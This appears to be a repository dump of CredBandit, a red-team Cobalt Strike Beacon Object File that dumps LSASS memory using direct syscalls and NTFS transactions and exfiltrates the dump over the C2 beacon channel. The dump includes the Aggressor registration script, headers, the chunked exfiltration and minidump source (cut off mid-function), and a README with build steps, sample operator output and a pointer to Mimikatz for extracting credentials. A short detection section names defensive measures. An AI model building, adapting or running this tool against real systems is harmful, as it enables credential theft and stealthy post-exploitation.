├── credBandit ├── credBanditx64.o └── MiniDumpWriteDump.cna ├── src ├── beacon.h ├── syscalls.h ├── credBandit.h ├── credBandit.c └── syscalls-asm.h └── README.md /credBandit/credBanditx64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xforcered/CredBandit/HEAD/credBandit/credBanditx64.o -------------------------------------------------------------------------------- /credBandit/MiniDumpWriteDump.cna: -------------------------------------------------------------------------------- 1 | #Register command 2 | beacon_command_register( 3 | "credBandit", 4 | "runs an all in memory custom MiniDumpWriteDump implementation using static x64 syscalls and exfiltrates the data back through your beacon or can write to disk.", 5 | "Synopsis: credBandit [download name]" 6 | ); 7 | 8 | alias credBandit { 9 | local('$barch $handle $data $args $target_pid'); 10 | println(@_); 11 | # figure out the arch of this session 12 | $barch = barch($1); 13 | # read in the right BOF file 14 | $handle = openf(script_resource("credBandit $+ $barch $+ .o")); 15 | $data = readb($handle, -1); 16 | closef($handle); 17 | if(size(@_) == 2) 18 | { 19 | # pack just the pid 20 | $args = bof_pack($1, "i", $2); 21 | } else if (size(@_) == 3){ 22 | # pack the pid and the file name to save as 23 | $args = bof_pack($1, "izi", $2, $3, strlen($3)); 24 | } else { 25 | berror($1, "Incorrect usage!"); 26 | berror($1, beacon_command_detail("credBandit")); 27 | return; 28 | } 29 | 30 | # announce what we're doing 31 | btask($1, "Running credBandit by (@anthemtotheego)", "T1003"); 32 | # execute it. 
33 | beacon_inline_execute($1, $data, "go", $args); 34 | } 35 | -------------------------------------------------------------------------------- /src/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 8 | */ 9 | 10 | /* data API */ 11 | typedef struct { 12 | char* original; /* the original buffer [so we can free it] */ 13 | char* buffer; /* current pointer into our buffer */ 14 | int length; /* remaining length of data */ 15 | int size; /* total size of this buffer */ 16 | } datap; 17 | 18 | DECLSPEC_IMPORT void BeaconDataParse(datap* parser, char* buffer, int size); 19 | DECLSPEC_IMPORT int BeaconDataInt(datap* parser); 20 | DECLSPEC_IMPORT short BeaconDataShort(datap* parser); 21 | DECLSPEC_IMPORT int BeaconDataLength(datap* parser); 22 | DECLSPEC_IMPORT char* BeaconDataExtract(datap* parser, int* size); 23 | 24 | /* format API */ 25 | typedef struct { 26 | char* original; /* the original buffer [so we can free it] */ 27 | char* buffer; /* current pointer into our buffer */ 28 | int length; /* remaining length of data */ 29 | int size; /* total size of this buffer */ 30 | } formatp; 31 | 32 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp* format, int maxsz); 33 | DECLSPEC_IMPORT void BeaconFormatReset(formatp* format); 34 | DECLSPEC_IMPORT void BeaconFormatFree(formatp* format); 35 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp* format, char* text, int len); 36 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp* format, char* fmt, ...); 37 | DECLSPEC_IMPORT char* BeaconFormatToString(formatp* format, int* size); 38 | DECLSPEC_IMPORT void BeaconFormatInt(formatp* format, int value); 39 | 40 | /* Output Functions */ 41 | #define CALLBACK_OUTPUT 0x0 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define 
CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | #define CALLBACK_FILE 0x02 46 | #define CALLBACK_FILE_WRITE 0x08 47 | #define CALLBACK_FILE_CLOSE 0x09 48 | 49 | DECLSPEC_IMPORT void BeaconPrintf(int type, char* fmt, ...); 50 | DECLSPEC_IMPORT void BeaconOutput(int type, char* data, int len); 51 | 52 | /* Token Functions */ 53 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 54 | DECLSPEC_IMPORT void BeaconRevertToken(); 55 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 56 | 57 | /* Spawn+Inject Functions */ 58 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char* buffer, int length); 59 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char* payload, int p_len, int p_offset, char* arg, int a_len); 60 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION* pInfo, char* payload, int p_len, int p_offset, char* arg, int a_len); 61 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION* pInfo); 62 | 63 | /* Utility Functions */ 64 | DECLSPEC_IMPORT BOOL toWideChar(char* src, wchar_t* dst, int max); 65 | -------------------------------------------------------------------------------- /src/syscalls.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "syscalls-asm.h" 5 | 6 | #ifndef InitializeObjectAttributes 7 | #define InitializeObjectAttributes( p, n, a, r, s ) { \ 8 | (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 9 | (p)->RootDirectory = r; \ 10 | (p)->Attributes = a; \ 11 | (p)->ObjectName = n; \ 12 | (p)->SecurityDescriptor = s; \ 13 | (p)->SecurityQualityOfService = NULL; \ 14 | } 15 | #endif 16 | 17 | typedef enum _SECTION_INHERIT 18 | { 19 | ViewShare = 1, 20 | ViewUnmap = 2 21 | } SECTION_INHERIT, *PSECTION_INHERIT; 22 | 23 | EXTERN_C NTSTATUS NtReadVirtualMemory( 24 | IN HANDLE ProcessHandle, 25 | IN PVOID BaseAddress OPTIONAL, 26 | OUT PVOID Buffer, 27 | IN SIZE_T BufferSize, 28 | OUT PSIZE_T NumberOfBytesRead OPTIONAL); 29 | 30 
| EXTERN_C NTSTATUS NtOpenProcessToken( 31 | IN HANDLE ProcessHandle, 32 | IN ACCESS_MASK DesiredAccess, 33 | OUT PHANDLE TokenHandle); 34 | 35 | EXTERN_C NTSTATUS NtAdjustPrivilegesToken( 36 | IN HANDLE TokenHandle, 37 | IN BOOLEAN DisableAllPrivileges, 38 | IN PTOKEN_PRIVILEGES NewState OPTIONAL, 39 | IN ULONG BufferLength, 40 | OUT PTOKEN_PRIVILEGES PreviousState OPTIONAL, 41 | OUT PULONG ReturnLength OPTIONAL); 42 | 43 | EXTERN_C NTSTATUS NtOpenProcess( 44 | OUT PHANDLE ProcessHandle, 45 | IN ACCESS_MASK DesiredAccess, 46 | IN POBJECT_ATTRIBUTES ObjectAttributes, 47 | IN PCLIENT_ID ClientId OPTIONAL); 48 | 49 | EXTERN_C NTSTATUS NtClose( 50 | IN HANDLE Handle); 51 | 52 | EXTERN_C NTSTATUS NtQuerySystemInformation( 53 | IN SYSTEM_INFORMATION_CLASS SystemInformationClass, 54 | IN OUT PVOID SystemInformation, 55 | IN ULONG SystemInformationLength, 56 | OUT PULONG ReturnLength OPTIONAL); 57 | 58 | EXTERN_C NTSTATUS NtMapViewOfSection( 59 | IN HANDLE SectionHandle, 60 | IN HANDLE ProcessHandle, 61 | IN OUT PVOID BaseAddress, 62 | IN ULONG ZeroBits, 63 | IN SIZE_T CommitSize, 64 | IN OUT PLARGE_INTEGER SectionOffset OPTIONAL, 65 | IN OUT PSIZE_T ViewSize, 66 | IN SECTION_INHERIT InheritDisposition, 67 | IN ULONG AllocationType, 68 | IN ULONG Win32Protect); 69 | 70 | EXTERN_C NTSTATUS NtCreateSection( 71 | OUT PHANDLE SectionHandle, 72 | IN ACCESS_MASK DesiredAccess, 73 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 74 | IN PLARGE_INTEGER MaximumSize OPTIONAL, 75 | IN ULONG SectionPageProtection, 76 | IN ULONG AllocationAttributes, 77 | IN HANDLE FileHandle OPTIONAL); 78 | 79 | EXTERN_C NTSTATUS NtCreateTransaction( 80 | OUT PHANDLE TransactionHandle, 81 | IN ACCESS_MASK DesiredAccess, 82 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 83 | IN LPGUID Uow OPTIONAL, 84 | IN HANDLE TmHandle OPTIONAL, 85 | IN ULONG CreateOptions OPTIONAL, 86 | IN ULONG IsolationLevel OPTIONAL, 87 | IN ULONG IsolationFlags OPTIONAL, 88 | IN PLARGE_INTEGER Timeout OPTIONAL, 89 | IN 
PUNICODE_STRING Description OPTIONAL); 90 | 91 | 92 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CredBandit 2 | 3 | CredBandit is a proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel. The memory dump is done by using NTFS transactions which allows us to write the dump to memory and the MiniDumpWriteDump API has been replaced with an adaptation of ReactOS's implementation of MiniDumpWriteDump. 4 | 5 | The memory dump is then downloaded over the beacon with Beacon's native download functionality. The advantage of doing it this way is that the dump is never written to disk and is sent via your already established C2 channel. 6 | 7 | # Subject References 8 | This tool wouldn't exist without being able to piggyback off some really great research, tools, and code already published by members of the security community. So thank you. Lastly, if you feel anyone has been left out below, please let me know and I will be sure to get them added. 
9 | - Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR (by [@Cneelis](https://twitter.com/Cneelis)) - [here](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/) 10 | - Direct Syscalls in Beacon Object Files (by [@Cneelis](https://twitter.com/Cneelis)) - [here](https://outflank.nl/blog/2020/12/26/direct-syscalls-in-beacon-object-files/) 11 | - TransactedSharpMiniDump - [here](https://github.com/PorLaCola25/TransactedSharpMiniDump) 12 | - rookuu/BOFS/MiniDumpWriteDump (by [@rookuu_](https://twitter.com/rookuu_)) - [here](https://github.com/rookuu/BOFs/tree/main/MiniDumpWriteDump) - Did all the heavy lifting for converting the ReactOS minidump.c to BOF-compatible code 13 | - SysWhispers (by [@Jackson_T](https://twitter.com/Jackson_T)) - [here](https://github.com/jthuraisamy/SysWhispers) 14 | - InlineWhispers - [here](https://github.com/outflanknl/InlineWhispers) 15 | - ([@ilove2pwn_](https://twitter.com/ilove2pwn_)) - Confirmed my original idea that the BeaconPrintf() function could be used to send data back through CS, and helped me get started with writing/understanding the amazing (insert == sarcasm) sleep language. I also borrowed and modified a little bit of logic for chunking data in C [here](https://gist.github.com/SecIdiot/82e4162e495602f064aba5b42575da5e) 16 | - ([@BinaryFaultline](https://twitter.com/BinaryFaultline)) - Added the ability to use beacon's native download functionality 17 | - ([@Cr0Eax](https://twitter.com/Cr0Eax) and [@_EthicalChaos_](https://twitter.com/_EthicalChaos_)) - Initial discovery and usage of Beacon's native download functionality. See their tweets about it: https://twitter.com/_EthicalChaos_/status/1413229432219779074?s=20 and https://twitter.com/Cr0Eax/status/1412761297951739907?s=20 18 | 19 | ## Getting Started 20 | 21 | 1. 
Copy the credBandit folder with all of its contents and place it in a directory just above your cobaltstrike folder on whatever system you plan to connect with via the GUI application. 22 | 2. Load in the MiniDumpWriteDump.cna Aggressor script 23 | 3. Run credBandit against the target LSASS process (or other process) 24 | 4. Download the dump file from the Aggressor Downloads console 25 | 5. Use Mimikatz to extract the dump file 26 | 27 | ### Build Your Own 28 | 29 | Run the below command inside the src directory 30 | ``` 31 | x86_64-w64-mingw32-gcc -o credBanditx64.o -c credBandit.c -masm=intel 32 | ``` 33 | 34 | ### Use Case 35 | 36 | > *With High or SYSTEM integrity, the operator can perform a memory dump of LSASS without ever touching disk* 37 | 38 | ### Syntax 39 | 40 | Performs a memory dump and sends it back through CS using the BeaconPrintf function. The second parameter, the output name, is optional and will show up in the Aggressor Downloads console as mem:\\[output].dmp 41 | 42 | ``` 43 | beacon> credBandit 708 output 44 | [*] Running credBandit by (@anthemtotheego) 45 | [+] host called home, sent: 18696 bytes 46 | [+] received output: 47 | [+] Attempting To Enable Debug Privs 48 | 49 | [+] received output: 50 | [+] Attempting To Dump Proccess 708 51 | 52 | [+] received output: 53 | [+] NtOpenProcess returned HANDLE 0x00000000000006CC 54 | 55 | [+] received output: 56 | [+] NtCreateTransaction returned HANDLE 0x00000000000006D4 57 | 58 | [+] received output: 59 | [+] RtlSetCurrentTransaction successfully set 60 | 61 | [+] received output: 62 | [+] NtCreateFile returned HANDLE 0x00000000000006D8 63 | 64 | [+] received output: 65 | [+] RtlSetCurrentTransaction successfully set 66 | 67 | [+] received output: 68 | [+] OS Version: 10.0.19042 69 | 70 | [+] received output: 71 | [+] MiniDump written to memory 72 | 73 | [+] received output: 74 | [+] MiniDump Size In Bytes = 109868198 75 | 76 | [+] received output: 77 | [+] NtCreateSection created 78 | 79 | [+] received output: 80 | 
[+] NtMapViewOfSection successful 81 | 82 | [*] started download of mem:\output.dmp (109868198 bytes) 83 | [*] download of output.dmp is complete 84 | ``` 85 | 86 | ## Caveats 87 | 88 | 1. While I have tried to make this pretty stable, and the download method has made it more stable, BOFs still carry the risk of causing a beacon to crash. Use at your own risk. 89 | 2. Since the BOF is executed in process and takes over the beacon while running, sleep time is not relevant. Data will be continuously sent while the dump is exfiltrated. 90 | 3. Lastly, I left comments in the code at the places where you could make modifications if you wanted to do other stuff, for example, write to disk instead, add in different encoding/encryption, comms, etc. 91 | 92 | ## Detection 93 | 94 | Some detection and mitigation strategies that could be used: 95 | 96 | 1. Credential Guard [here](https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage) 97 | 2. Event Tracing [here](https://docs.microsoft.com/en-us/windows/win32/etw/about-event-tracing) 98 | 3. Looking for suspicious processes accessing LSASS 99 | 4. Looking for other known Cobalt Strike Beacon IOCs or C2 egress/communication IOCs. 
100 | -------------------------------------------------------------------------------- /src/credBandit.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) 6 | #define STATUS_SUCCESS 0 7 | #define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) 8 | #define FILE_OVERWRITE_IF 0x00000005 9 | #define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 10 | #define FILE_CREATE 0x00000002 11 | #define FILE_NON_DIRECTORY_FILE 0x00000040 12 | #define OBJ_CASE_INSENSITIVE 0x00000040L 13 | #define ARRAY_SIZE(a) (sizeof(a)/sizeof((a)[0])) 14 | 15 | WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap(); 16 | WINBASEAPI void * WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); 17 | WINBASEAPI LPVOID WINAPI KERNEL32$HeapReAlloc (HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes); 18 | WINBASEAPI BOOL WINAPI KERNEL32$HeapFree (HANDLE, DWORD, PVOID); 19 | WINBASEAPI int WINAPI KERNEL32$lstrlenW (LPCWSTR lpString); 20 | WINBASEAPI LPWSTR WINAPI KERNEL32$lstrcpyW (LPWSTR lpString1, LPCWSTR lpString2); 21 | WINBASEAPI DWORD WINAPI KERNEL32$GetLastError (VOID); 22 | WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentProcess (VOID); 23 | WINBASEAPI DWORD WINAPI KERNEL32$SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod); 24 | WINBASEAPI BOOL WINAPI KERNEL32$SetFilePointerEx(HANDLE hFile, LARGE_INTEGER liDistanceToMove, PLARGE_INTEGER lpDistanceToMoveHigh, DWORD dwMoveMethod); 25 | WINBASEAPI BOOL WINAPI KERNEL32$WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped); 26 | WINBASEAPI void WINAPI KERNEL32$GetSystemInfo(LPSYSTEM_INFO lpSystemInfo); 27 | WINBASEAPI BOOL WINAPI KERNEL32$IsProcessorFeaturePresent(DWORD ProcessorFeature); 28 | WINBASEAPI BOOL WINAPI KERNEL32$GetFileSizeEx(HANDLE hFile, 
PLARGE_INTEGER lpFileSize); 29 | WINBASEAPI SIZE_T WINAPI KERNEL32$VirtualQueryEx(HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength); 30 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileA (LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); 31 | WINBASEAPI DWORD WINAPI KERNEL32$GetProcessId(HANDLE Process); 32 | WINBASEAPI BOOL WINAPI KERNEL32$ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead); 33 | WINBASEAPI VOID WINAPI KERNEL32$Sleep (DWORD dwMilliseconds); 34 | WINBASEAPI void *__cdecl MSVCRT$memcpy(void * __restrict__ _Dst,const void * __restrict__ _Src,size_t _MaxCount); 35 | WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count); 36 | WINBASEAPI void* WINAPI MSVCRT$malloc(SIZE_T); 37 | DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char *_Str1,const char *_Str2); 38 | WINBASEAPI void* WINAPI MSVCRT$free(void*); 39 | WINBASEAPI BOOL IMAGEAPI DBGHELP$EnumerateLoadedModulesW64(HANDLE hProcess, PENUMLOADED_MODULES_CALLBACKW64 EnumLoadedModulesCallback, PVOID UserContext); 40 | WINBASEAPI BOOL IMAGEAPI DBGHELP$SymInitializeW(HANDLE hProcess, PCWSTR UserSearchPath, BOOL fInvadeProcess); 41 | WINBASEAPI BOOL IMAGEAPI DBGHELP$SymCleanup(HANDLE hProcess); 42 | WINADVAPI BOOL WINAPI ADVAPI32$LookupPrivilegeValueW(LPCWSTR lpSystemName, LPCWSTR lpName, PLUID lpLuid); 43 | DECLSPEC_IMPORT DWORD WINAPI PSAPI$GetModuleFileNameExW(HANDLE hProcess, HMODULE hModule, LPWSTR lpFilename, DWORD nSize); 44 | DECLSPEC_IMPORT DWORD WINAPI VERSION$GetFileVersionInfoSizeW(LPCWSTR lptstrFilenamea ,LPDWORD lpdwHandle); 45 | DECLSPEC_IMPORT WINBOOL WINAPI VERSION$GetFileVersionInfoW(LPCWSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData); 46 | DECLSPEC_IMPORT WINBOOL WINAPI VERSION$VerQueryValueW(LPCVOID pBlock, LPCWSTR 
lpSubBlock, LPVOID *lplpBuffer, PUINT puLen); 47 | WINADVAPI WINBOOL WINAPI ADVAPI32$LookupPrivilegeValueW(LPCWSTR lpSystemName, LPCWSTR lpName, PLUID lpLuid); 48 | WINBASEAPI void WINAPI MSVCRT$srand(int initial); 49 | WINBASEAPI int WINAPI MSVCRT$rand(); 50 | WINBASEAPI time_t WINAPI MSVCRT$time(time_t *time); 51 | WINBASEAPI void WINAPI MSVCRT$sprintf(char*, char[], ...); 52 | WINBASEAPI int __cdecl MSVCRT$_snprintf(char* s, size_t n, const char* fmt, ...); 53 | 54 | typedef void (WINAPI* _RtlInitUnicodeString) (PUNICODE_STRING DestinationString, PCWSTR SourceString); 55 | typedef NTSTATUS (WINAPI* _RtlSetCurrentTransaction) (PHANDLE); 56 | 57 | typedef struct _THREAD_BASIC_INFORMATION 58 | { 59 | NTSTATUS ExitStatus; 60 | PVOID TebBaseAddress; 61 | CLIENT_ID ClientId; 62 | KAFFINITY AffinityMask; 63 | KPRIORITY Priority; 64 | KPRIORITY BasePriority; 65 | } THREAD_BASIC_INFORMATION, * PTHREAD_BASIC_INFORMATION; 66 | 67 | typedef DWORD RVA; 68 | typedef ULONG64 RVA64; 69 | 70 | struct process 71 | { 72 | struct process* next; 73 | HANDLE handle; 74 | const struct loader_ops* loader; 75 | WCHAR* search_path; 76 | WCHAR* environment; 77 | 78 | PSYMBOL_REGISTERED_CALLBACK64 reg_cb; 79 | PSYMBOL_REGISTERED_CALLBACK reg_cb32; 80 | BOOL reg_is_unicode; 81 | DWORD64 reg_user; 82 | 83 | struct module* lmodules; 84 | ULONG_PTR dbg_hdr_addr; 85 | 86 | IMAGEHLP_STACK_FRAME ctx_frame; 87 | 88 | unsigned buffer_size; 89 | void* buffer; 90 | 91 | BOOL is_64bit; 92 | }; 93 | 94 | struct dump_context 95 | { 96 | /* process & thread information */ 97 | struct process* process; 98 | DWORD pid; 99 | HANDLE handle; 100 | unsigned flags_out; 101 | /* thread information */ 102 | struct dump_thread* threads; 103 | unsigned num_threads; 104 | /* module information */ 105 | struct dump_module* modules; 106 | unsigned num_modules; 107 | unsigned alloc_modules; 108 | /* exception information */ 109 | /* output information */ 110 | MINIDUMP_TYPE type; 111 | HANDLE hFile; 112 | RVA rva; 113 
| struct dump_memory* mem; 114 | unsigned num_mem; 115 | unsigned alloc_mem; 116 | struct dump_memory64* mem64; 117 | unsigned num_mem64; 118 | unsigned alloc_mem64; 119 | /* callback information */ 120 | MINIDUMP_CALLBACK_INFORMATION* cb; 121 | }; 122 | 123 | struct line_info 124 | { 125 | ULONG_PTR is_first : 1, 126 | is_last : 1, 127 | is_source_file : 1, 128 | line_number; 129 | union 130 | { 131 | ULONG_PTR pc_offset; /* if is_source_file isn't set */ 132 | unsigned source_file; /* if is_source_file is set */ 133 | } u; 134 | }; 135 | 136 | struct module_pair 137 | { 138 | struct process* pcs; 139 | struct module* requested; /* in: to module_get_debug() */ 140 | struct module* effective; /* out: module with debug info */ 141 | }; 142 | 143 | enum pdb_kind { PDB_JG, PDB_DS }; 144 | 145 | struct pdb_lookup 146 | { 147 | const char* filename; 148 | enum pdb_kind kind; 149 | DWORD age; 150 | DWORD timestamp; 151 | GUID guid; 152 | }; 153 | 154 | struct cpu_stack_walk 155 | { 156 | HANDLE hProcess; 157 | HANDLE hThread; 158 | BOOL is32; 159 | struct cpu* cpu; 160 | union 161 | { 162 | struct 163 | { 164 | PREAD_PROCESS_MEMORY_ROUTINE f_read_mem; 165 | PTRANSLATE_ADDRESS_ROUTINE f_xlat_adr; 166 | PFUNCTION_TABLE_ACCESS_ROUTINE f_tabl_acs; 167 | PGET_MODULE_BASE_ROUTINE f_modl_bas; 168 | } s32; 169 | struct 170 | { 171 | PREAD_PROCESS_MEMORY_ROUTINE64 f_read_mem; 172 | PTRANSLATE_ADDRESS_ROUTINE64 f_xlat_adr; 173 | PFUNCTION_TABLE_ACCESS_ROUTINE64 f_tabl_acs; 174 | PGET_MODULE_BASE_ROUTINE64 f_modl_bas; 175 | } s64; 176 | } u; 177 | }; 178 | 179 | struct dump_memory 180 | { 181 | ULONG64 base; 182 | ULONG size; 183 | ULONG rva; 184 | }; 185 | 186 | struct dump_memory64 187 | { 188 | ULONG64 base; 189 | ULONG64 size; 190 | }; 191 | 192 | struct dump_module 193 | { 194 | unsigned is_elf; 195 | ULONG64 base; 196 | ULONG size; 197 | DWORD timestamp; 198 | DWORD checksum; 199 | WCHAR name[MAX_PATH]; 200 | }; 201 | 202 | struct dump_thread 203 | { 204 | ULONG tid; 205 | 
ULONG prio_class; 206 | ULONG curr_prio; 207 | }; 208 | -------------------------------------------------------------------------------- /src/credBandit.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "credBandit.h" 6 | #include "syscalls.h" 7 | #include "beacon.h" 8 | 9 | /*Download File*/ 10 | void downloadFile(char* fileName, int downloadFileNameLength, char* returnData, int fileSize) { 11 | 12 | //Intializes random number generator to create fileId 13 | time_t t; 14 | MSVCRT$srand((unsigned)MSVCRT$time(&t)); 15 | int fileId = MSVCRT$rand(); 16 | 17 | //8 bytes for fileId and fileSize 18 | int messageLength = downloadFileNameLength + 8; 19 | char* packedData = (char*)MSVCRT$malloc(messageLength); 20 | 21 | //pack on fileId as 4-byte int first 22 | packedData[0] = (fileId >> 24) & 0xFF; 23 | packedData[1] = (fileId >> 16) & 0xFF; 24 | packedData[2] = (fileId >> 8) & 0xFF; 25 | packedData[3] = fileId & 0xFF; 26 | 27 | //pack on fileSize as 4-byte int second 28 | packedData[4] = (fileSize >> 24) & 0xFF; 29 | packedData[5] = (fileSize >> 16) & 0xFF; 30 | packedData[6] = (fileSize >> 8) & 0xFF; 31 | packedData[7] = fileSize & 0xFF; 32 | 33 | int packedIndex = 8; 34 | 35 | //pack on the file name last 36 | for (int i = 0; i < downloadFileNameLength; i++) { 37 | packedData[packedIndex] = fileName[i]; 38 | packedIndex++; 39 | } 40 | 41 | BeaconOutput(CALLBACK_FILE, packedData, messageLength); 42 | 43 | if (fileSize > (1024 * 900)){ 44 | 45 | //Lets see how many times this constant goes into our file size, then add one (because if it doesn't go in at all, we still have one chunk) 46 | int numOfChunks = (fileSize / (1024 * 900)) + 1; 47 | int index = 0; 48 | int chunkSize = 1024 * 900; 49 | 50 | while(index < fileSize) { 51 | if (fileSize - index > chunkSize){//We have plenty of room, grab the chunk and move on 52 | 53 | /*First 4 are the fileId 54 | then account for 
length of file 55 | then a byte for the good-measure null byte to be included 56 | then lastly is the 4-byte int of the fileSize*/ 57 | int chunkLength = 4 + chunkSize; 58 | char* packedChunk = (char*) MSVCRT$malloc(chunkLength); 59 | 60 | //pack on fileId as 4-byte int first 61 | packedChunk[0] = (fileId >> 24) & 0xFF; 62 | packedChunk[1] = (fileId >> 16) & 0xFF; 63 | packedChunk[2] = (fileId >> 8) & 0xFF; 64 | packedChunk[3] = fileId & 0xFF; 65 | 66 | int chunkIndex = 4; 67 | 68 | //pack on the file name last 69 | for (int i = index; i < index + chunkSize; i++) { 70 | packedChunk[chunkIndex] = returnData[i]; 71 | chunkIndex++; 72 | } 73 | 74 | BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength); 75 | 76 | } else {//This chunk is smaller than the chunkSize, so we have to be careful with our measurements 77 | 78 | int lastChunkLength = fileSize - index + 4; 79 | char* lastChunk = (char*) MSVCRT$malloc(lastChunkLength); 80 | 81 | //pack on fileId as 4-byte int first 82 | lastChunk[0] = (fileId >> 24) & 0xFF; 83 | lastChunk[1] = (fileId >> 16) & 0xFF; 84 | lastChunk[2] = (fileId >> 8) & 0xFF; 85 | lastChunk[3] = fileId & 0xFF; 86 | int lastChunkIndex = 4; 87 | 88 | //pack on the file name last 89 | for (int i = index; i < fileSize; i++) { 90 | lastChunk[lastChunkIndex] = returnData[i]; 91 | lastChunkIndex++; 92 | } 93 | BeaconOutput(CALLBACK_FILE_WRITE, lastChunk, lastChunkLength); 94 | } 95 | 96 | index = index + chunkSize; 97 | 98 | } 99 | 100 | } else { 101 | 102 | /*first 4 are the fileId 103 | then account for length of file 104 | then a byte for the good-measure null byte to be included 105 | then lastly is the 4-byte int of the fileSize*/ 106 | int chunkLength = 4 + fileSize; 107 | char* packedChunk = (char*) MSVCRT$malloc(chunkLength); 108 | 109 | //pack on fileId as 4-byte int first 110 | packedChunk[0] = (fileId >> 24) & 0xFF; 111 | packedChunk[1] = (fileId >> 16) & 0xFF; 112 | packedChunk[2] = (fileId >> 8) & 0xFF; 113 | packedChunk[3] = fileId & 
0xFF; 114 | int chunkIndex = 4; 115 | 116 | //pack on the file name last 117 | for (int i = 0; i < fileSize; i++) { 118 | packedChunk[chunkIndex] = returnData[i]; 119 | chunkIndex++; 120 | } 121 | 122 | BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength); 123 | } 124 | 125 | 126 | //We need to tell the teamserver that we are done writing to this fileId 127 | char packedClose[4]; 128 | 129 | //pack on fileId as 4-byte int first 130 | packedClose[0] = (fileId >> 24) & 0xFF; 131 | packedClose[1] = (fileId >> 16) & 0xFF; 132 | packedClose[2] = (fileId >> 8) & 0xFF; 133 | packedClose[3] = fileId & 0xFF; 134 | BeaconOutput(CALLBACK_FILE_CLOSE, packedClose, 4); 135 | 136 | return; 137 | } 138 | 139 | /*Begin MiniDumpWriteDump reactOS Code*/ 140 | static BOOL fetch_process_info(struct dump_context* dc) 141 | { 142 | ULONG buf_size = 0x1000; 143 | NTSTATUS nts; 144 | SYSTEM_PROCESS_INFORMATION* pcs_buffer; 145 | 146 | if (!(pcs_buffer = (SYSTEM_PROCESS_INFORMATION*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0, buf_size))) return FALSE; 147 | for (;;) 148 | { 149 | nts = NtQuerySystemInformation(SystemProcessInformation, 150 | pcs_buffer, buf_size, NULL); 151 | if (nts != 0xC0000004L) break; 152 | pcs_buffer = (SYSTEM_PROCESS_INFORMATION*)KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), 0, pcs_buffer, buf_size *= 2); 153 | if (!pcs_buffer) return FALSE; 154 | } 155 | 156 | if (nts == 0) 157 | { 158 | SYSTEM_PROCESS_INFORMATION* spi = pcs_buffer; 159 | 160 | for (;;) 161 | { 162 | if (HandleToUlong(spi->UniqueProcessId) == dc->pid) 163 | { 164 | dc->num_threads = spi->NumberOfThreads; 165 | dc->threads = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0, 166 | dc->num_threads * sizeof(dc->threads[0])); 167 | if (!dc->threads) goto failed; 168 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pcs_buffer); 169 | return TRUE; 170 | } 171 | if (!spi->NextEntryOffset) break; 172 | spi = (SYSTEM_PROCESS_INFORMATION*)((char*)spi + spi->NextEntryOffset); 173 | } 174 | } 175 | 
